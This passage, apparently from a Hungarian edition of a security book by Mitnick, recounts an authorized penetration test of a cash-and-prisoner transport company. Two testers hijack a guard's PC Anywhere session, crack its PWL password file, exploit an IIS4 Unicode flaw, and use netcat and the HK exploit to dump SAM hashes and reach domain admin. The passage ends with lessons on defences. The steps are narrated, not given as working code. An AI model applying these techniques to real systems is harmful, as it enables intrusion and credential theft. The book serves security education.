ebben a hálózatban. Át kellett gondolnunk hogyan tovább.
Úgy döntöttek, hogy lenyomozzák a konzolnaplóban felfedezett IP-
címeket. – Láttuk, hogy a következő lépés az lesz, hogy körülnézünk és
kiderítjük, hogy mi kommunikált távolról ezzel a 3COM eszközzel,
mert ha be tudnánk törni az eszközbe, esetleg képesek lennénk egy a
hálózathoz csatlakozó létező kapcsolatot eltéríteni. – Vagy talán
képesek lesznek megszerezni a hitelesítéshez szükséges felhasználói
nevet és jelszót, hogy jogosult felhasználónak álcázzák magukat
Louis elmondta, hogy ismertek egyes szűrőszabályokat, és a tűzfal e
szabályait megkerülő utak után kutattak. Abban reménykedett, hogy
képesek lesznek „olyan megbízhatónak tekintett rendszereket találni,
amelyeknek jogosultsága van a tűzfalon keresztüli bejutásra. Az
előkerülő IP-címek nagyon érdekesek voltak számunkra.”
Ha csatlakozva voltak a 3COM rendszerkonzolhoz, magyarázta,
minden egyes alkalommal, amikor egy távoli felhasználó csatlakozott
vagy a konfigurációs változtatás történt, figyelmeztető üzenet jelent
meg a képernyő alján. – Láttuk az ezekbe az IP-címekbe bemenő
kapcsolatokat.
A regisztrációs rekord részletes adatokat közölt arról a szervezetről,
amelyhez az adott IP-cím regisztrálva volt. Ezek a rekordok a szervezet
hálózatáért felelős adminisztratív vagy műszaki személyzet
kontaktadatait is tartalmazták. A címekkel ismét a RIPE regisztrációs
adatbázisrekordjaihoz fordultak, amely információkat közölt velük
azokról a cégekről, amelyeknek ezek az IP-címek ki voltak osztva.
Ez a keresés újabb meglepetéssel szolgált. – Azt találtuk, hogy a
címek egy az adott országban működő, nagy telefonszolgáltatóhoz
voltak bejegyezve. Ekkor nem teljesen tudtuk ezt összerakni, nem
igazán értettük, mik ezek az IP-címek, miért csatlakoznak az emberek
egy telekom cégtől – mondta Louis az Angliában megszokott kifejezést
használva az Internet szolgáltatóra. A két fiú elgondolkodott azon,
hogy a VPN csatlakozások egyáltalán a cég távoli felhasználóitól
jöttek-e, vagy teljesen máshonnan, egy olyan helyről, amellyel
kapcsolatban ebben a pillanatban még csak ötletük sem volt.
Ott tartottunk, hogy le kell ülnünk és agyalnunk kell. Valahogy össze
kellett rakni a képet, hogy megértsük, és elkezdhessünk valamivel
próbálkozni.
A reggeli ígéret még nem teljesült. Hozzáférésünk volt a rendszerhez,
de még mindig nem jutottunk tovább, és úgy éreztük, hogy semmit nem
haladtunk aznap. De ahelyett, hogy egyszerűen hazahúztunk volna,
hogy majd másnap reggel újra találkozzunk a gépnél, arra gondoltunk,
hogy beülünk egy kocsmába, iszunk egyet, levezetjük a feszültséget és
kitisztítjuk a fejünket, mielőtt buszra szállnánk és hazamennénk.
Kora tavasz volt, kicsit csípős levegővel. Kijöttünk az irodából, és a
sarki, igazi sötét és ütött-kopott kocsmába mentünk. Én sört ittam,
Brock pedig barackpálinkát limonádéval – jó ital, ki kell próbálnod. És
csak ültünk ott, beszélgettünk és szánakoztunk saját magunkon, hogy
mennyire nem úgy alakult a nap, ahogy elterveztük. Az elsőital után
kicsit már lazábbak voltunk, és előkerült egy darab papír és egy toll is.
Elkezdtünk ötleteket felvetni arról, hogy mit is tegyünk ezután.
Nagyon rákattantunk arra, hogy valamit mindenképpen kitaláljunk,
és amikor reggel visszajövünk, gyorsan a géphez üljünk, és legyen mit
kipróbálni. Felvázoltuk az előttünk idáig körvonalazódott hálózati
architektúrát, próbáltuk kitalálni, hogy milyen felhasználóknak van
szüksége VPN hozzáférésre, fizikailag hol helyezkedtek el a rendszerek,
és milyen lépésekre gondolhattak a rendszer kivitelezői, amikor távoli
hozzáférést állították be a cég számára.
Felrajzoltuk az általunk ismert rendszereket, és megpróbáltuk
megfejteni a további részleteket, kitalálni, hol lehetnek azok a
rendszerek [lásd a 9-1. ábrát]. Rá kellett jönnünk, hogy a 3COM eszköz
a hálózaton belül hol helyezkedett el.
9-1. Ábra: A két hacker így képzelte el a konfigurációt, ez a felállás
magyarázta meg a hálózattal és annak működésével kapcsolatban
általuk tapasztaltakat.
Louis azon merengett, hogy a cég alkalmazottain kívül kinek lehet
még szüksége a hálózathoz való hozzáférésre. A cég nagyon büszke
volt a technológiai fejlesztéseire, így Louis és Brock azt gondolta, hogy
talán „olyan igazán nagyszerű disztribúciós alkalmazást” fejlesztettek
ki, amely lehetővé tette, hogy az őrök egy szállítás befejezés után
bejelentkezzenek, és így derítsék ki, hogy mi lesz a következő
fuvarjuk. Ezt az alkalmazást esetleg úgy programozták be, hogy
automatizálással bolondbiztossá tegyék a folyamatot. Talán a sofőr egy
ikonra kattint, amely az alkalmazásszerverhez való csatlakozásra
utasítja az alkalmazást, és így kapják meg a következő megrendelést.
Azt gondoltuk, hogy ezek a sofőrök nem lehetnek túl jártasak a
számítógépekben, ezért egy nagyon egyszerűen használható rendszert
állítanak be számukra. Próbáltunk a vállalkozás agyával gondolkodni:
Milyen rendszer lenne egyszerűen beállítható, milyen rendszer lenne
könnyen kezelhető, ám ugyanakkor elég biztonságos?
Betárcsázó szolgáltatásra gondoltak, „talán egy a vezetőfülkében
elhelyezett laptopról. És a cégnek vagy hostolnia kell ezeket a
szervereket, amelyekbe bejutottunk, vagy külső céghez kell őket
kihelyezniük. Azt feltételeztük, hogy a külső fél egy telefonszolgáltató
volt, így az információnak el kellett jutnia a telefonszolgáltatótól a
biztonsági cégig, és talán egy VPN alagúton keresztül jut át az
Interneten.” – Azt gyanították, hogy az őrök betárcsáznak az Internet
szolgáltatóhoz, és ott hitelesítik őket, mielőtt a cég hálózatához való
csatlakozást engedélyeznék.
Azonban volt egy másik lehetőség is. Louis így folytatta:
A következőket tételeztük fel: Nézzük, hogy ki tudunk-e dolgozni egy
olyan architektúrát, amelyben a gépkocsiban ülő őr betárcsázhat,
elküldi a hitelesítőazonosítóit, amelyeket valójában a biztonsági cég,
nem pedig a telefonszolgáltató ellenőriz. Hogyan lehet a céges VPN-t
úgy beállítani, hogy az őrtől a cégnek küldött bármilyen információ ne
titkosítás nélkül közlekedjen az Interneten?
Azon is gondolkodtak, hogy a cég hogyan hitelesíti a felhasználókat.
Ha egy őrnek be kell tárcsáznia a telefontársaságnál elhelyezett
rendszerek valamelyikébe és a telefontársaság felé kell hitelesítenie
magát, okoskodtak, akkor a hitelesítési szolgáltatásokat egyszerűen
kihelyezték. Talán volt egy másik megoldás is, gondolták, amelyben a
hitelesítőszervereket valójában a cég és nem a telefonszolgáltató
hostolta.
A hitelesítés feladatát sokszor egy külön ezt a funkciót ellátó
szerverre sózzák. A 3COM eszközt talán a cég belső hálózatán levő
hitelesítőszerverhez való hozzáférésre használták. A mobil modemről
tárcsázó őr az Internet-szolgáltatóhoz csatlakozik, onnan a 3COM
eszközhöz továbbítják, s felhasználói nevét és jelszavát ezt követően
hitelesítés céljából elküldik egy másik szerverhez.
Az volt a feltevésük, hogy amikor a biztonsági őr betárcsázós
kapcsolatot kezdeményez, VPN-t hoz létre maga és a 3COM eszköz
között.
Louis és Brock azt gyanították, hogy a belső hálózathoz való
hozzáférés érdekében először az annál az Internet-szolgáltatónál levő
telekommunikációs rendszerhez kell hozzáférést szerezniük, amelyhez
a sofőrök csatlakoztak. De „az egyik dolog, amit nem tudtunk, az a
betárcsázó szolgáltatásoknak a telefonszáma volt. Egy idegen
országban voltak, nem tudtuk, hogy milyen típusú telefonvonalakról
van szó, és nem sok esélyünk volt, hogy magunktól kiderítjük ezt. A
nagy dolog, amit tudtunk, az volt, hogy a VPN-hez használt protokoll
típusa PPTP” Ez azért fontos, mert a Microsoft alapértelmezett VPN
telepítése csak egy megosztott titkot használ, ami általában a
szerverhez vagy a domainhez tanozó windows-os felhasználói név és
jelszó.
Ekkorra néhány ital már bennük volt, és úgy döntöttek, hogy
„mindent szabad” megközelítéssel oldják meg a problémát.
Ekkor már azért tartod meg a papírt, amire mindent írogattál, mert
tudod, hogy igazán jó hackelés lesz, ha bejutunk. És ott volt bennünk a
büszkeség érzése, mert tudtuk, hogy hogyan fogjuk megcsinálni.

Néhány gondolat a hackerek megérzéseiről

A két srác által azon az estén összehozott tipp egész pontosnak


bizonyult. Louis a következő megjegyzést tette arról a szellemi
látásmódról, amivel egy jó hacker – úgy tűnik – rendelkezik:
Nagyon nehéz elmagyarázni, hogy mi kelti ezt a megérzést.
Egyszerűen a tapasztalatból jön, illetve abból, hogy megvizsgáljuk,
hogy van a rendszer beállítva.
Brock már a legelején azt érezte, hogy folytatni kell a dolgot, mert
azt gondolta, hogy igenis lesz eredménye a kutatásainknak; nagyon
nehéz ezt megmagyarázni. A hackerek megérzései?
Csak információmorzsákat látsz és azt, ahogy dolgok felépülnek,
majd apránként betekintést nyersz a cégbe, illetve az informatikai
rendszerekért felelős emberek munkájába. És ott van még az az érzés,
hogy ezt meg azt tudják ugyan a biztonságról, de valamit talán egy
kicsit rosszul csináltak.
A témáról alkotott saját véleményem szerint a hackerek egyszerű
körülszaglászással nyernek betekintést az üzleti környezetben felállított
hálózatokba és rendszerekbe. Némi tapasztalat után rájönnek, hogyan
gondolkoznak a rendszergazdák, illetve a hálózatok megalkotói. Olyan
ez, mint egy sakkjátszma, amelyben megpróbáljuk kitalálni, mire
készül az ellenfél, és így járunk túl az eszén.
Azt hiszem, hogy ami igazán számít, az a tapasztalat, hogy hogyan
állítják be a rendszergazdák a hálózatokat, és milyen gyakori hibákat
követnek el. Talán Louis-nak igaza volt az elején tett megjegyzésével:
amit egyesek megérzésnek hívnak, sokkal jobb tapasztalatnak
tekinteni.

A negyedik nap

Amikor másnap reggel bementek az irodába, odaültek a géphez, és a


3COM eszközön levő konzolnaplót figyelték becsatlakozó emberekre
várva. Minden egyes kapcsolódásnál – amilyen gyorsan csak tudták –
portszkennelést végeztek a bejövő csatlakozást intéző IP-címen.
Azt tapasztalták, hogy ezek a kapcsolatok talán egy percig éltek,
majd bontották őket. Ha jól gondolkodtak, akkor az őr betárcsázott,
felvette a rendelést, majd visszatért offline üzemmódba. Ami azt
jelentette, hogy nagyon gyorsan kellett cselekedniük. – Amikor láttuk,
hogy az IP-címek felvillannak, nagyon keményen vertük a
kliensrendszert – jegyezte meg Louis, a „verés” kifejezés alatt azt
értve, hogy megemelkedett adrenalinszinttel kopogtatták a billentyűket,
mintha egy izgalmas számítógépes játékkal játszanának.
Kiválasztottak néhány esetlegesen sebezhető portot, azt remélvén,
találnak egy megtámadhatót, például egy telnet vagy egy FTP szervert,
vagy egy nem megbízható webszervert. Vagy talán a NetBIOS-on
keresztül hozzáférést szerezhetnek nyitott megosztott állományokhoz.
Olyan GUl-alapú távoli elérést biztosító programok után is kutattak,
mint a WinVNC és a PC Anywhere.
De a reggel lassan már eltelt, és néhány hoston kívül egyetlen futó
szolgáltatást sem találtak.
Nem igazán jutottunk előrébb, csak ültünk és folytattuk a
letapogatást minden egyes alkalommal, amikor egy távoli felhasználó
csatlakozott. És ekkor egyszer csak csatlakozott egy gép.
Portszkennelést végeztünk, és találtunk egy nyitott portot, amelyet
általában a PC Anywhere alkalmazáshoz használnak.
A PC Anywhere alkalmazás lehetővé teszi egy számítógép távolról
történő vezérlését. Ez azonban csak akkor lehetséges, amikor a másik
számítógépen is fut ez a program.
Látván a portszkennelés által feldobott portot, újult erőre kapott a
lelkesedésünk: – Ó, PC Anywhere van ezen a gépen. Ez az egyik
végfelhasználói gép lehet, menjünk, nézzük meg.
Körbekiabáltunk a szobában: – Kinek van telepítve a PC
Anywhere!?
Valaki visszakiáltott: – Nekem van PC Anywhere-em. – Átkiáltottam
az IP-címet, hogy a lehetőleggyorsabban csatlakozhasson a
rendszerhez.
Louis „meghatározó pillanatnak” nevezte a PC Anywhere
rendszerhez való csatlakozási kísérletet. Átment a másik gépnél levő
sráchoz, miközben egy ablak jelent meg a képernyőjén. – Először csak
egy fekete háttér látszik – mondta Louis –, és két dolog közül az egyik
történik – vagy egy szürke jelszó prompt jelenik meg, vagy a háttér
kékre vált, és egy windows-os asztal lesz látható.
Lélegzet-visszafojtva figyeltünk, remélve hogy az asztal fog
megjelenni. Egy örökkévalóságnak tűnt, amíg a fekete
képernyőeltűnésére vártunk. Azt mondogattam magamban:
„Csatlakozz, csatlakozz, kifog futni az időből.” Vagy „Ugyis
jelszópromptot fogok kapni.”
Végül az utolsó pillanatban, amikor azt gondoltam, hogy „Na, most
jön a jelszó prompt”, megjelent a Windows asztal Ejha! Megvolt egy
asztal A szobában mindenki odajött és nézett minket.
A reakcióm ez volt: – Gyerünk, használjuk ki, ne hagyjuk ki ezt az
esélyt!
Sikeresen bejutottak a 3COM eszközhöz csatlakozott kliensbe.
Ekkor azt gondoltuk, hogy ölni vagy halni – tudtuk, hogy ezek az
emberek csak nagyon rövid ideig lesznek kapcsolatban, és azzal is
tisztában voltunk, hogy nem biztos, hogy lesz még egy lehetőség.
Első dolguk a PC Anywhere munkafolyamat (session) megnyitása,
illetve két, a képernyő levő gomb megnyomása volt. E gombokra Louis
a „Sötétítsd el a képernyőt gomb”-ként és „Zárd ki a felhasználót a
konzolból gomb”-ként hivatkozott. így magyarázta el:
A PC Anywhere esetén alapértelmezésben a gép asztalánál
levőszemély és a PC Anywhere-t használó személy is hozzáfér az
egérhez, mindketten mozgathatják azt a képernyőn, alkalmazásokat
indíthatnak el vele, fájlokat nyithatnak meg és így tovább. De a PC
Anywhere-rel ki lehet zárni a billentyűzetnél levőfelhasználót.
Pontosan ezt tették ők is, megszerezték a munkafolyamat feletti
irányítást, és arról is gondoskodtak, hogy a felhasználó ne lássa, amit
csinálnak, ezért elsötétítették a képernyőjét. Loius tudta, hogy nem sok
idejük van addig, amíg a felhasználó gyanakodni kezd, vagy azt hiszi,
hogy valamilyen számítógépes problémája van, és kikapcsolja a gépét,
ami azt jelentené, hogy a fiúk kiszorulnak a gépből.
Megpróbáltuk kihasználni, hogy végre bejutottunk. Itt nagyon
gyorsan ki kellett találnunk, hogy mivel fogunk következőleg
próbálkozni, és milyen értékes információkat próbálunk megszerezni a
gépről
Láttam, hogy a gép Microsoft Windows 98-at futtatott, szóval találni
kellett valakit, aki tudja, hogy milyen információkat lehet kiszedni egy
Windows 98-as gépből
Szerencsére a szobában levőegyik srác... érdeklődött a dolog iránt, ő
igazából nem is a mi projektünkön dolgozott, de tudta, hogyan lehet
információkat szerezni a rendszerekről.
Azt javasolta, hogy először a jelszólista (PWL) fájlt nézzék meg. (Ez
a Windows 95, 98 és ME verziókban használt fájl olyan titkos
információkat tartalmaz, mint például a betárcsázási és hálózati
jelszavak. Ha például Windows alatt használunk egy betárcsázó
hálózatot, akkor minden hitelesítési adat, így a betárcsázó szám, a
felhasználói név és a jelszó nagy valószínűséggel egy PWL fájlban
lesznek eltárolva.)
A fájl letöltése előtt ki kellett kapcsolniuk a vírusirtó szoftvert, hogy
az ne észlelje az általuk használt eszközöket. Ezt követően a PC
Anywhere dokumentumtovábbító képességét próbálták meg
kihasználni a PWL. fájlnak az őr gépéről a sajátjukra küldéséhez. Nem
működött. – Nem tudtuk, hogy miért nem, de nem volt időnk ezen
töprengeni. Nagyon rövid idő alatt le kellett szednünk a PWL
információt a gépről, amíg az őr még kapcsolatban van.
Mi mást tehettek még? Egy szóba jöhető lehetőség; feltöltenek egy
crackelő eszközt, a PWL fájlt feltörik az őr gépén, szövegfájlba
exportálják az információkat, majd a szövegfájlt elküldik saját
maguknak. A PWL crackelő eszköz letöltése érdekében megpróbáltak
bejelentkezni egy FTP szerverre. Ekkor azonban újabb nehézséggel
találták szembe magukat: az őr számítógépének billentyűzetkiosztása
idegen nyelvű volt, így nem sikerült belépniük a szerverre. – Az idegen
billentyűzetkiosztás miatt állandóan a „Hibás bejelentkezés”
hibaüzenetet kaptuk.
Az óra egyre csak ketyegett.
Azt gondoltuk, hogy mindjárt lejár az időnk. Ül ez a fickó a
pénzszállító autóban, lehet, hogy egy halom pénz van a kocsiban, vagy
esetleg rabok. És azt gondolja magában, „Mi az ördög folyik itt?”
Attól féltem, hogy mielőtt megszerezhetnénk, amit akarunk, bontja a
kapcsolatot.
Ott álltak az idő szorításában, és a szobában senki sem tudta az
idegen billentyűzet problémájára a megoldást. Talán
kényszermegoldásként ASCII kódban kellene bevinniük a felhasználói
névben és a jelszóban levő számokat és betűkét. Azonban fejből senki
nem tudta, hogy kell a karaktereket azok ASCII kód ekvivalensével
bevinni.
Mit csinál a mai világban bárki, ha gyorsan meg kell tudnia valamit?
Louis és Brock is pontosan ezt tették: – Felmentünk az Internetre, és
rákerestünk, hogy hogyan lehet a billentyűzet betűinek használata
nélkül betűket bevinni.
Rövid időn belül megtalálták a választ: aktiváld a Num Lock
billentyűt, majd tartsd lenyomva az <Alt> billentyűt és a numerikus
billentyűzeten gépeld be az ASCII karakter számát. A többi már
könnyen ment:
Gyakran kell betűket és szimbólumokat ASCII-be, illetve ASCII-ből
fordítani. Ilyenkor egyszerűen felállunk, és a falra tűzött hasznos lapok
egyikéről leolvassuk a szükséges információt.
A fiúk szexi lányok erotikus képei helyett ASCII táblázatot tartanak
a falon. – ASCII lányok – nevetett Louis.
Kibogarászták a kódokat, az egyik srác a gépnél ülve begépelte azt,
amit a többiek mondtak neki, és így sikeresen bevitték a felhasználói
nevet és a jelszót. Ezt követően le tudták tölteni a PWL feltörő eszközt,
lefuttatva azt szöveges fájlba kivonatolták a PWL fájlban levő
információkat, majd az őr laptopjáról az általuk használt FTP szerverre
továbbították a fájlt.
Amikor Louis átvizsgálta a fájlt, megtalálta a keresett hitelesítési
adatokat, többek között a sofőr által a cég VPN szolgáltatásához való
csatlakozáshoz használt betárcsázó számot és bejelentkezési
információkat. Louis arra gondolt, hogy mindössze ezekre volt
szüksége.
Miközben a biztonság kedvéért eltakarították látogatásuk minden
nyomát, Louis megvizsgálta az asztalon levő ikonokat, és észrevette
egy olyat, amely úgy tűnt, hogy az őr által a cégtől érkező információk
megszerzésére használandó alkalmazást futtatta. És így már azt is
tudták, hogy ezek a gépek valóban a céghez csatlakoztak, és az
alkalmazásszervertől kérdezték le a terepen levő sofőrök számára
szükséges információkat.

Hozzáférés a cég rendszeréhez

– Tökéletesen tisztában voltunk azzal – emlékszik vissza Louis –,


hogy ez a felhasználó esetleg jelenti a különös eseményt, így eltűntünk
a helyszínről. Tudtuk azt is, hogy ha jelentik az incidenst, és leállítják a
VPN szolgáltatást, a megszerzett bejelentkezési adatokkal semmire
nem megyünk.
Néhány másodperc múlva észrevették, hogy a PC Anywhere
kapcsolatuk bontva lett – az őr megszüntette a csatlakozást. Louis és
csapata az utolsó pillanatban szerezte meg a PWL fájlban levő
információkat.
Most már Louis és Brock kezében volt egy telefonszám, amely –
számításuk szerint – az előző este a kocsmában lerajzolt ábrán levő
betárcsázó eszközök valamelyikéhez tartozott. Ez azonban megint egy
külföldi telefonszám volt. Az őr által futtatott Windows rendszerrel
megegyező rendszert használva betárcsáztak a cég hálózatába,
megadták a felhasználói nevet és jelszót, és „azt láttuk, hogy sikerült
VPN munkafolyamatot létrehoznunk”.
A VPN úgy volt beállítva, hogy a cég DMZ-jén belül kaptak egy
virtuális IP-címet, így az első tűzfal mögött voltak, azonban még
mindig a korábban felfedezett, a belső hálózatot védő tűzfallal álltak
szemben.
A VPN által kiosztott IP-cím a DMZ tartományban volt, és
valószínűleg a belső hálózaton levő egyes gépek megbízhatónak
tekintették azt. Louis arra számított, hogy a belső hálózatba való
bejutás sokkal-sokkal könnyebb lesz, mivel az első tűzfalon már
túljutottak. – Ekkor – mondja – arra számítottunk, hogy könnyen
átjutunk a tűzfalon, be a belső hálózatokba. – Amikor azonban
megpróbálta, azt találta, hogy az alkalmazásszervert futtató gépen levő
egyetlen kihasználható szolgáltatáshoz sem fér hozzá közvetlenül. –
Volt egy nagyon furcsa TCP port, amelyet a szűrés átengedett, és
amiről mi azt gondoltuk, hogy az őrök által használt alkalmazás
számára van fenntartva. De azt nem tudtuk, hogyan működik.
Louis egy olyan rendszert akart találni a cég belső hálózatán,
amelyhez hozzáférnek a számukra kiosztott IP-címmel. A „szokásos
hacker módszert” választotta, azaz olyan rendszert próbált találni,
amelyet ki tudnak használni a belső hálózaton.
Azt remélték, hogy a hálózaton egy olyan rendszerre bukkannak,
amely távolról még soha nem volt elérhető, hiszen akkor talán még
nem tettek rá biztonsági javításokat ezen sebezhetőségek ellen, és így
„sokkal nagyobb valószínűséggel csak belső használatra való
rendszerként kezelik”. Port-szkennelő használatával hozzáférhető
webszerver (80-as port) után kutattak a belső hálózat teljes IP-cím
tartományában, és találtak egy olyan windows-os szervert, amellyel
kommunikálhattak, és amely Internet Information Servert (IIS)
futtatott, azonban a népszerű szerverszoftver egy régebbi verzióját – az
IIS4-et. Ez remek hír volt, mert valószínűleg találni fognak olyan ki
nem javított sebezhetőséget vagy konfigurációs hibát, amely megnyitja
nekik a mennyország kapuját.
Első dolguk az IIS4 szerveren egy Unicode sebezhetőségészlelő
eszköz futtatása volt, hogy lássák, sebezhető-e, és mint rövidesen
kiderült, az volt. (A Unicode egy 16 bites karakterkészlet a sok
különböző nyelv karaktereinek egyetlen karakterkészlettel történő
kódolására.) Louis elmondta, hogy „a Unicode sebezhetőséggel
parancsokat adhattunk az IIS webszervernek” a belső hálózatuk
második tűzfala mögött, vagy ahogy Louis fogalmaz, „mélyen bent a
megbízható területen” levő egyik rendszer biztonsági sebezhetőségeit
kiaknázva. A hackerek ebben az esetben egy olyan webes kérést
(HTTP) hoztak össze, amely ezeket a különlegesen kódolt karaktereket
használta a webszerver biztonsági ellenőrzéseinek kikerülésére, így
ugyanolyan jogosultságokkal futtathattak tetszőleges parancsokat, mint
amilyen account alatt a webszerver futott.
Kicsit meg voltak lőve, mivel nem tudtak fájlokat feltölteni, azonban
felcsillant előttük egy lehetőség. A Unicode sebezhetőség
kihasználásával az „echo” shell parancsot futtatva feltöltöttek egy
Active Server Pages (ASP) szkriptet – egy egyszerű fájlfeltöltőt, amely
gyerekjátékká tette a hackelő eszközöknek a szerver oldali szkriptek
futtatására jogosult webgyökérbe történő feltöltését. (A webgyökér a
webszerver gyökérkönyvtára, a „web” szóval különböztetik meg egy
adott merevlemez, például a C:gyökérkönyvtárától.) Az echo parancs
egyszerűen kiírja a hozzáadott bármilyen argumentumot; a felhasználó
képernyőjén való kiíratás helyett egy fájlba is irányíthatjuk az outputot.
Például az „echo owned > mitnick.txt” paranccsal a mitnick.txt fájlba
írhatjuk az „owned” szót. Echo parancsok sorozatával a webszerver
egy futtatható könyvtárába írták egy ASP szkript forráskódját.
Ezt követően hackelő eszközöket töltöttek fel, köztük a népszerű
hálózati eszközt, a netcatet, amely igen hasznos segédalkalmazás egy
bejövő port lehallgatására szolgáló parancsértelmező shell beállítására.
Egy HK nevű exploit eszközt is feltöltöttek, amely a Windows NT egy
régebbi verziójának egyik sebezhetőségét kihasználva rendszergazdai
jogosultságokat tud szerezni.
A HK exploit futtatása céljából egy másik egyszerű szkriptet is
felraktak, majd a netcatet használták egy hozzájuk visszakapcsolódó
shell kapcsolat megnyitására, így – a DOS operációs rendszer idején
ismert „DOS parancssorhoz” hasonló módon – képesek voltak
parancsokat bevinni a célgépbe. – Próbáltunk kimenő kapcsolatot
kezdeményezni a belső webszerverről a DMZ-n levő
számítógépünkhöz – meséli Louis. – De ez nem sikerült, ezért a „port
barging” nevű technikát használtuk. – A HK program rendszergazdai
jogosultságok megszerzése céljából történő lefuttatása után a 80-as port
lehallgatására állították be a netcatet; a 80-as porthoz érkező első
bejövő kapcsolatot figyelve átmenetileg „túrja ki” az IIS szervert az
útból.
Louis a következőkkel magyarázta meg a barging fogalmát: –
Lényegében az történik, hogy egy shell ellopása érdekében átmenetileg
kinyomod az útból az IIS-t, és hagyod, hogy az US pontosan akkor
mászhasson vissza, amikor hozzáférést szerzel a shelledhez. – A Unix
típusú operációs rendszerekkel ellentétben a Windows-os környezetben
megengedett, hogy két program egyszerre használja ugyanazt a portot.
A támadó úgy tudja kihasználni a rendszer ezen tulajdonságát, hogy
keres egy a tűzfal által nem szűrt portot, majd betolakszik oda.
Ezt tette Louis és Brock is. Az IIS hoston szerzett shell hozzáférésük
az ahhoz az accounthoz rendelt jogosultságokra korlátozódott, amely
alatt a webszerver futott. Ezért a HK-t és a netcatet lefuttatva teljes
körű rendszerjogosultságokat szereztek – rendszergazdaként futtatták a
rendszert, ami az operációs rendszeren elérhető legmagasabb
jogosultságokat biztosította számukra. A szokásos módszerek
használata mellett ez a hozzáférés azt jelentette, hogy teljes mértékben
irányításuk alá vonták a cél windows-os környezetét.
A szerver Windows NT 4.0-t futtatott. A támadók meg akarták
szerezni a Security Accounts Manager (SAM) fájl egy másolatát,
amely a felhasználói nevek, csoportok, házirendek és hozzáférési
vezérlők részleteit tartalmazta. Az operációs rendszer ezen régebbi
változata alatt a „rdisk /s” parancs futtatásával vészhelyzeti
javítólemezt készítettek. A program több fájlt hoz létre a „repair” nevű
könyvtárban. A fájlok között volt a szerveren levő összes felhasználói
névhez tartozó jelszó hash-eket tartalmazó SAM fájl frissített változata.
Korábban Louis és Brock egy biztonsági őr laptopjáról szerezték meg a
titkos jelszavakat tartalmazó PWL fájlt; ez alkalommal magáról a cég
egyik szerveréről szedték le a felhasználók titkosított jelszavait.
Egyszerűen a webszerver webgyökerébe másolták ezt a SAM fájlt. –
Ezt követően egy böngészővel a szerverről az irodánkban levő
számítógépünkre hoztuk azt.
Amikor feltörték a SAM fájlban levő jelszavakat, észrevették, hogy
azon a helyi gépen van egy másik, a beépített rendszergazdai fióktól
eltérő account.
Miután úgy néhány órát eltöltöttünk vele, sikerült ennek az
accountnak a jelszavát is feltörni, majd megkíséreltük az elsődleges
tartományvezérlővel ellenőriztetni azt. És felfedeztük, hogy a helyi
accountnak, amelynek az általunk meghackelt webszerveren
rendszergazdai jogosultságai voltak, ugyanaz volt a jelszava a
domainen is! Az accountnak domain adminisztrátori jogosultsága volt.
Szóval volt egy helyi rendszergazdai account a webszerveren,
amelynek ugyanaz volt a neve, mint a teljes domain egy domain
adminisztrátori accountjának, és mindkét accounthoz ugyanaz a jelszó
tartozott. Nyilvánvalóan egy rendszergazda lusta volt, és ugyanazon a
néven állított be egy második accountot, mint amit a helyi rendszeren
rendszergazdai accountként használt, és ráadásul ugyanazt a jelszót
választotta ki hozzá.
Lépésről lépésre. A helyi account egyszerűen csak a webszerveren
volt rendszergazda, és semmilyen jogosultsága nem volt a teljes
domain felett. Azonban a gondatlan, lusta rendszergazdának
köszönhetően a helyi webszerver account jelszavának megszerzésével
immár a domain adminisztrátor accountba is be tudtak hatolni. A
domain adminisztrátor feladata egy teljes domain kezelése, míg a
rendszergazda csupán a helyi asztali gépet vagy a laptopot kezeli
(vagyis egyetlen gépet). Louis szerint ez a rendszergazda sem volt
kivétel.
Elterjedt gyakorlat, mindig ezt látjuk. A domain adminisztrátor helyi
fiókokat hoz létre a hálózaton levőgépeken, és ugyanazt a jelszót
használja a fiókjaihoz domain adminisztrátori jogosultságokkal. És ez
azt jelenti, hogy a helyi rendszerek bármelyikének feltörése
felhasználható a teljes domain feltörésére.

Cél teljesítve

Egyre közelebb. Louis és Brock látták, hogy most már teljes


mértékben irányításuk alá vonhatják az alkalmazásszervert, illetve az
azon levő adatokat. Az alkalmazásszerverhez való csatlakozáshoz
használt IP-címet a biztonsági őr laptopjáról szerezték meg. Ebből
megtudták, az alkalmazás-szerver ugyanazon a hálózaton van, amely
valószínűleg ugyanannak a tartománynak a része. Végül teljes
mértékben irányításuk alá vonták a cég minden műveletét.
Ekkor a vállalkozás szívének-lelkének kellős közepébe jutottunk.
Megváltoztathattuk az alkalmazásszerveren levőmegrendeléseket, az
őrökkel oda szállíthattuk a pénzt, ahova akartuk. Végeredményben akár
olyan utasításokat is adhattunk az őröknek, mint a vedd fel a pénzt ettől
vagy attól a cégtől, és vidd el erre vagy arra a címre”, mi pedig majd
ott várjuk őket.
Vagy „Vedd fel az A rabot, vidd el ide, add át ennek a személynek a
felügyeletét”, és már ki is hoztad a börtönből az unokatestvéred legjobb
barátját. Vagy egy terroristát. Kezükben volt a meggazdagodás vagy a
pusztítás eszköze. – Bizonyos módon megdöbbentő volt, mert nem
látták, hogy mi történhetett volna, ha nem hívjuk fel rá a figyelmüket –
mondja Louis.
Amit az a cég „biztonságnak” hitt, véli ő, „az valójában a biztonság
vélelme”.

BETEKINTÉS

Louis és Brock nem gazdagodtak meg a kezükben levő hatalomból,


és nem adtak ki utasítást egyetlen rab elengedésére vagy átszállítására
sem. Ehelyett az általuk felfedezett dolgokat taglaló teljes jelentést
adtak át a cégnek.
A fiúk által visszahallottak alapján a cég igen felelőtlen volt. Nem
hajtottak végre egy lépésről lépésre haladó kockázatelemzést – „Ha az
első gépet feltöri egy hacker, mit tud azzal csinálni?” és így tovább.
Biztonságosnak hitték magukat, mivel néhány konfigurációs
változtatással be tudták zárni a Louis-ék által feltárt rést. Azt
feltételezték, hogy a Louis és Brock által felfedezett és kihasznált
hibákon kívül egyetlen másik sem volt.
Louis az üzleti szektorban gyakran megfigyelhető önteltségnek látja
ezt – nehogy már egy kívülálló kezdjen nekik a biztonságról papolni. A
cég informatikai szakemberei nem bánják, ha felhívják a figyelmüket
néhány kijavítandó dologra, de azt nem fogadják el, hogy valaki
megmondja nekik, hogy mit kell csinálniuk. Azt hiszik, hogy ők már
tudják. Amikor a betörés megtörténik, azt gondolják, hogy az egész
egyszeri és megismételhetetlen.

ÓVINTÉZKEDÉSEK

Mint a könyv oly sok más történetében, a támadók itt is csak néhány
biztonsági hibát találtak az általuk célba vett cégnél, de az a kevés, amit
megtaláltak, elegendőnek bizonyult ahhoz, hogy a cég üzleti
működéséhez szükséges teljes számítógépes hálózatot a birtokukba
vegyék. Következzék néhány tanulság, amit érdemes megjegyezni.

Ideiglenes megoldások

